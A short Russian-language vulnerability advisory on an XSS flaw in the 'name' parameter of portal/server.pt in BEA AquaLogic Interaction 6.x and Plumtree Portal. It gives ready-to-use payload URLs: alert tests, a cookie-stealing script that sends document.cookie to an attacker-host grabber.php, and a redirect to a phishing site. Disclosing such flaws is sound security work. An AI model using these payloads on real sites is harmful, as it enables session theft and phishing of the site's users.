Программа:
BEA AquaLogic Interaction 6.x
Plumtree Portal Platform

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "name" сценарием portal/server.pt. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Запуск JavaScript alert в браузере пользователя:

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript') </script>

https://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert ('CanCrossSiteScript')%3C/script%3E%3C!--

Подмена cookie:

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http:// [attackerssite]/grabber.php?c="%2bdocument.cookie</script>

http://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow. location="http://[attackerssite]/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--

Кража пароля:

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>window.location ="http://[phisherssite]"</script>

http://[hostname]/portal/server.pt?open=space&name=%22;}%3C/ script%3E%3Cscript%3Ewindow.location="http://[phisherssite]%3C/script%3E%3C!--

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии